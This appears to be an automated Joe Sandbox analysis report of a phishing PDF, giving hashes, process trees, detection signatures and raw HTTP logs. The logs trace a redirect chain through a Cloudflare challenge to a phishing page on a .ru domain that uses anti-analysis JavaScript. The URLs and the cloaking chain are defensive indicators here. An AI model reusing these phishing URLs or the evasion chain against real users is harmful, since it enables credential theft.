Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eCompleted_419z.pdf

Overview

General Information

Sample name:eCompleted_419z.pdf
Analysis ID:1580318
MD5:ebca5b55f1c16010777c928c6a4d0c19
SHA1:92f6a8adaeb45ab8defb4362f6373eed170f0e88
SHA256:56a416833aea8cbd27cd1ec3115cbc9f0e3f7cd90ea767f0f6fe68fd9dba0084
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected suspicious Javascript
IP address seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 6612 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\eCompleted_419z.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 3716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7328 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1480,i,3501403854715251483,1322142389642693983,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7220 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://5m9sp7.naomijewelryjapan.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4588 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2392,i,16451973532312144551,1979798678558124622,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_204JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://e84.zolivor.ru/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_204, type: DROPPED
    Source: 1.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://e84.zolivor.ru/OSkl/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external domain. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially execute further malicious actions.
    Source: 1.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://e84.zolivor.ru/OSkl/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: https://5m9sp7.naomijewelryjapan.com/HTTP Parser: No favicon
    Source: https://e84.zolivor.ru/OSkl/HTTP Parser: No favicon
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
    Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
    Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 5m9sp7.naomijewelryjapan.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: 5m9sp7.naomijewelryjapan.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5m9sp7.naomijewelryjapan.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5m9sp7.naomijewelryjapan.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: 5m9sp7.naomijewelryjapan.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5m9sp7.naomijewelryjapan.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5m9sp7.naomijewelryjapan.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6f283fab80c461&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f6f283fab80c461&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 5m9sp7.naomijewelryjapan.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5m9sp7.naomijewelryjapan.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f6f283fab80c461/1735028274208/0c794be9e99943a3c3c5c96ce0a6874a8ab0d195fbf88e0680b941f8e8598dee/E4LtmRjqgUWrvFG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f6f283fab80c461/1735028274213/xzuZuxWFN2xIUod HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f6f283fab80c461/1735028274213/xzuZuxWFN2xIUod HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /OSkl/ HTTP/1.1Host: e84.zolivor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://5m9sp7.naomijewelryjapan.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://e84.zolivor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e84.zolivor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e84.zolivor.ru/OSkl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im1CM3pYYVNmRXRjQnJOWk1Ia3lYZkE9PSIsInZhbHVlIjoiNmJpQXpmRmM1RzB1M0hkTzJKUHhYaTJ0RkRpblM4WGZ3eUFSQ3JNckgvWjJvRjdOWHUrRDdhYzB3UUtUaEk1ZkRXRUpjcUgvR3dsdHFaNm9vRHYxR292Um9aT3JZd2txRFErS0xCTDlaNVVKbm5TeXR1SEVPaGVRVkJSeGlFNFoiLCJtYWMiOiIxMGU4NWExMzhhMjc4ZjdlYjg1MTg4NWNjNDc4ZGQ4ZjI1ZDUyZWVjNDdmYWYyYzYwYzRhMTQzY2RkMzIzOTE4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Inl0MXdpNDhPdlhMR3lsQmk0eXhUelE9PSIsInZhbHVlIjoiUHZ2YXhiUTc2TU42c3M0YktZcG5UbzJIdWVsTC9oaWYrQmNsR3Vod2ZRcmpXeEdRK1FjN3FCd1N0QUZyQjRGanYyNU4zdGZlTEYraE8zUzlBSzVZVG1oVjlzYzl3eEhuTGVjS2ZsZjdGS0JYVTlnV3hHQ0RtTUFicUZXejV3M0MiLCJtYWMiOiJhODIwZjFkNDNmNjhlOGJjZTRiYTIxYzFiNzFiZjZlYzgwYWJlYmYxNGI5M2U2OTZjNDIyMzE1MTE3MDUyMWUxIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: global trafficDNS traffic detected: DNS query: 5m9sp7.naomijewelryjapan.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: e84.zolivor.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1051869797:1735024320:IePYw59lC450fl-fS2825LbsrFD98zENLaISTPTr8OQ/8f6f283fab80c461/LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3243sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: LQB0sesjB32uRGl9mSIODHOainJwQfcKTHtD7fEYyKk-1735028270-1.1.1.1-8kmp3gMrmc6r6H8oJcLLo8wq1NZlkBylBjTASe5988ErKXZo7PiPV1HTrW9FveFmsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/obnyp/0x4AAAAAAA34ghPqNBRUmTxK/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 08:17:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 30 Sep 2022 16:21:28 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 08:17:56 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: JH6IfFNIDAxz6//NeoU/AR2VEROGeYm64yo=$O8O7EqopsE58zDBuServer: cloudflareCF-RAY: 8f6f2869eff042ac-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 08:18:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: AXkoIWPg4j6LAK5SHuvaxqO8dOZtnJGZCJ4=$KrlFAmnqGvLSROO5Server: cloudflareCF-RAY: 8f6f28947bce0f6f-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 08:20:04 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: GIhTtWJP5eK6/ARlTii+y1cCukh0/H4+D7M=$X9BHLj215Sa6DcgNcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f6f2b8a4b05f797-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 08:20:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIVv040PwPep6UsZ77yq0Gpisrq2Md6QC%2BNHamYjY1r67rQcC%2BJG3ketZmlH6tatsRHXOnRdZXMiGaMiNOBuGT%2B1RO562TfBQ0dC%2FnvlilupHTkVw9IcKyAvPRmM2Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1058&min_rtt=934&rtt_var=73&sent=173&recv=92&lost=0&retrans=0&sent_bytes=152504&recv_bytes=9481&delivery_rate=23260476&cwnd=257&unsent_bytes=0&cid=5728de065a65d76d&ts=991203&x=0"CF-Cache-Status: HITAge: 12078Server: cloudflareCF-RAY: 8f6f2badb837424b-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1546&rtt_var=593&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1890&delivery_rate=1823860&cwnd=248&unsent_bytes=0&cid=d412bb2ff8c26f7f&ts=4324&x=0"
    Source: chromecache_201.10.drString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: chromecache_201.10.drString found in binary or memory: http://gmpg.org/xfn/11
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
    Source: eCompleted_419z.pdfString found in binary or memory: https://5m9sp7.naomijewelryjapan.com/)
    Source: chromecache_207.10.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
    Source: chromecache_210.10.dr, chromecache_212.10.drString found in binary or memory: https://e84.zolivor.ru/OSkl/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
